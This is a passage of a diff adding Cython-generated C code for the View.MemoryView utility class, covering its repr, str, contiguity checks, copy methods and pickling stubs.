PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 617, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_2); + __pyx_t_1 = 0; + __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyString_Format(__pyx_kp_s_MemoryView_of_r_at_0x_x, __pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 617, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":616 + * return 0 + * + * def __repr__(self): # <<<<<<<<<<<<<< + * return "" % (self.base.__class__.__name__, + * id(self)) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview.__repr__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":620 + * id(self)) + * + * def __str__(self): # <<<<<<<<<<<<<< + * return "" % (self.base.__class__.__name__,) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview___str__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_memoryview___str__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__str__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_14__str__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_14__str__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__str__", 0); + + /* "View.MemoryView":621 + * + * def __str__(self): + * return "" % (self.base.__class__.__name__,) # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_base); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 621, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_class); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 621, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_name_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 621, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = PyTuple_New(1); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 621, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_t_1); + __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyString_Format(__pyx_kp_s_MemoryView_of_r_object, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 621, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":620 + * id(self)) + * + * def __str__(self): # <<<<<<<<<<<<<< + * return "" % (self.base.__class__.__name__,) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.__str__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":624 + * + * + * def is_c_contig(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview_is_c_contig(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_memoryview_is_c_contig(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("is_c_contig (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("is_c_contig", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "is_c_contig", 0))) return NULL; + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_16is_c_contig(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_16is_c_contig(struct __pyx_memoryview_obj *__pyx_v_self) { + __Pyx_memviewslice *__pyx_v_mslice; + __Pyx_memviewslice __pyx_v_tmp; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice *__pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("is_c_contig", 0); + + /* "View.MemoryView":627 + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + * mslice = get_slice_from_memview(self, &tmp) # <<<<<<<<<<<<<< + * return slice_is_contig(mslice[0], 'C', self.view.ndim) + * + */ + __pyx_t_1 = __pyx_memoryview_get_slice_from_memoryview(__pyx_v_self, (&__pyx_v_tmp)); if (unlikely(__pyx_t_1 == ((__Pyx_memviewslice *)NULL))) __PYX_ERR(1, 627, __pyx_L1_error) + __pyx_v_mslice = __pyx_t_1; + + /* "View.MemoryView":628 + * cdef __Pyx_memviewslice tmp + * mslice = get_slice_from_memview(self, &tmp) + * return slice_is_contig(mslice[0], 'C', self.view.ndim) # <<<<<<<<<<<<<< + * + * def is_f_contig(self): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PyBool_FromLong(__pyx_memviewslice_is_contig((__pyx_v_mslice[0]), 'C', __pyx_v_self->view.ndim)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 628, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":624 + * + * + * def is_c_contig(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.is_c_contig", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":630 + * return slice_is_contig(mslice[0], 'C', self.view.ndim) + * + * def is_f_contig(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview_is_f_contig(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_memoryview_is_f_contig(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("is_f_contig (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("is_f_contig", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "is_f_contig", 0))) return NULL; + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_18is_f_contig(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_18is_f_contig(struct __pyx_memoryview_obj *__pyx_v_self) { + __Pyx_memviewslice *__pyx_v_mslice; + __Pyx_memviewslice __pyx_v_tmp; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice *__pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("is_f_contig", 0); + + /* "View.MemoryView":633 + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + * mslice = get_slice_from_memview(self, &tmp) # <<<<<<<<<<<<<< + * return slice_is_contig(mslice[0], 'F', self.view.ndim) + * + */ + __pyx_t_1 = __pyx_memoryview_get_slice_from_memoryview(__pyx_v_self, (&__pyx_v_tmp)); if (unlikely(__pyx_t_1 == ((__Pyx_memviewslice *)NULL))) __PYX_ERR(1, 633, __pyx_L1_error) + __pyx_v_mslice = __pyx_t_1; + + /* "View.MemoryView":634 + * cdef __Pyx_memviewslice tmp + * mslice = get_slice_from_memview(self, &tmp) + * return slice_is_contig(mslice[0], 'F', self.view.ndim) # <<<<<<<<<<<<<< + * + * def copy(self): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PyBool_FromLong(__pyx_memviewslice_is_contig((__pyx_v_mslice[0]), 'F', __pyx_v_self->view.ndim)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 634, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":630 + * return slice_is_contig(mslice[0], 'C', self.view.ndim) + * + * def is_f_contig(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice *mslice + * cdef __Pyx_memviewslice tmp + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.is_f_contig", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":636 + * return slice_is_contig(mslice[0], 'F', self.view.ndim) + * + * def copy(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice mslice + * cdef int flags = self.flags & ~PyBUF_F_CONTIGUOUS + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview_copy(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_memoryview_copy(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("copy (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("copy", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "copy", 0))) return NULL; + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_20copy(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_20copy(struct __pyx_memoryview_obj *__pyx_v_self) { + __Pyx_memviewslice __pyx_v_mslice; + int __pyx_v_flags; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("copy", 0); + + /* "View.MemoryView":638 + * def copy(self): + * cdef __Pyx_memviewslice mslice + * cdef int flags = self.flags & ~PyBUF_F_CONTIGUOUS # <<<<<<<<<<<<<< + * + * slice_copy(self, &mslice) + */ + __pyx_v_flags = (__pyx_v_self->flags & (~PyBUF_F_CONTIGUOUS)); + + /* "View.MemoryView":640 + * cdef int flags = self.flags & ~PyBUF_F_CONTIGUOUS + * + * slice_copy(self, &mslice) # <<<<<<<<<<<<<< + * mslice = slice_copy_contig(&mslice, "c", self.view.ndim, + * self.view.itemsize, + */ + __pyx_memoryview_slice_copy(__pyx_v_self, (&__pyx_v_mslice)); + + /* "View.MemoryView":641 + * + * slice_copy(self, &mslice) + * mslice = slice_copy_contig(&mslice, "c", self.view.ndim, # <<<<<<<<<<<<<< + * self.view.itemsize, + * flags|PyBUF_C_CONTIGUOUS, + */ + __pyx_t_1 = __pyx_memoryview_copy_new_contig((&__pyx_v_mslice), ((char *)"c"), __pyx_v_self->view.ndim, __pyx_v_self->view.itemsize, (__pyx_v_flags | PyBUF_C_CONTIGUOUS), __pyx_v_self->dtype_is_object); if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 641, __pyx_L1_error) + __pyx_v_mslice = __pyx_t_1; + + /* "View.MemoryView":646 + * self.dtype_is_object) + * + * return memoryview_copy_from_slice(self, &mslice) # <<<<<<<<<<<<<< + * + * def copy_fortran(self): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __pyx_memoryview_copy_object_from_slice(__pyx_v_self, (&__pyx_v_mslice)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 646, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":636 + * return slice_is_contig(mslice[0], 'F', self.view.ndim) + * + * def copy(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice mslice + * cdef int flags = self.flags & ~PyBUF_F_CONTIGUOUS + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.copy", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":648 + * return memoryview_copy_from_slice(self, &mslice) + * + * def copy_fortran(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice src, dst + * cdef int flags = self.flags & ~PyBUF_C_CONTIGUOUS + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview_copy_fortran(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_memoryview_copy_fortran(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("copy_fortran (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("copy_fortran", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "copy_fortran", 0))) return NULL; + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_22copy_fortran(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_22copy_fortran(struct __pyx_memoryview_obj *__pyx_v_self) { + __Pyx_memviewslice __pyx_v_src; + __Pyx_memviewslice __pyx_v_dst; + int __pyx_v_flags; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("copy_fortran", 0); + + /* "View.MemoryView":650 + * def copy_fortran(self): + * cdef __Pyx_memviewslice src, dst + * cdef int flags = self.flags & ~PyBUF_C_CONTIGUOUS # <<<<<<<<<<<<<< + * + * slice_copy(self, &src) + */ + __pyx_v_flags = (__pyx_v_self->flags & (~PyBUF_C_CONTIGUOUS)); + + /* "View.MemoryView":652 + * cdef int flags = self.flags & ~PyBUF_C_CONTIGUOUS + * + * slice_copy(self, &src) # <<<<<<<<<<<<<< + * dst = slice_copy_contig(&src, "fortran", self.view.ndim, + * self.view.itemsize, + */ + __pyx_memoryview_slice_copy(__pyx_v_self, (&__pyx_v_src)); + + /* "View.MemoryView":653 + * + * slice_copy(self, &src) + * dst = slice_copy_contig(&src, "fortran", self.view.ndim, # <<<<<<<<<<<<<< + * self.view.itemsize, + * flags|PyBUF_F_CONTIGUOUS, + */ + __pyx_t_1 = __pyx_memoryview_copy_new_contig((&__pyx_v_src), ((char *)"fortran"), __pyx_v_self->view.ndim, __pyx_v_self->view.itemsize, (__pyx_v_flags | PyBUF_F_CONTIGUOUS), __pyx_v_self->dtype_is_object); if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 653, __pyx_L1_error) + __pyx_v_dst = __pyx_t_1; + + /* "View.MemoryView":658 + * self.dtype_is_object) + * + * return memoryview_copy_from_slice(self, &dst) # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __pyx_memoryview_copy_object_from_slice(__pyx_v_self, (&__pyx_v_dst)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 658, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":648 + * return memoryview_copy_from_slice(self, &mslice) + * + * def copy_fortran(self): # <<<<<<<<<<<<<< + * cdef __Pyx_memviewslice src, dst + * cdef int flags = self.flags & ~PyBUF_C_CONTIGUOUS + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.copy_fortran", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_memoryview_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_memoryview_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf___pyx_memoryview___reduce_cython__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_memoryview___reduce_cython__(CYTHON_UNUSED struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.memoryview.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_memoryview_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_memoryview_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.memoryview.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf___pyx_memoryview_2__setstate_cython__(((struct __pyx_memoryview_obj *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_memoryview_2__setstate_cython__(CYTHON_UNUSED struct __pyx_memoryview_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + + /* function exit code */ + __pyx_L1_error:; + 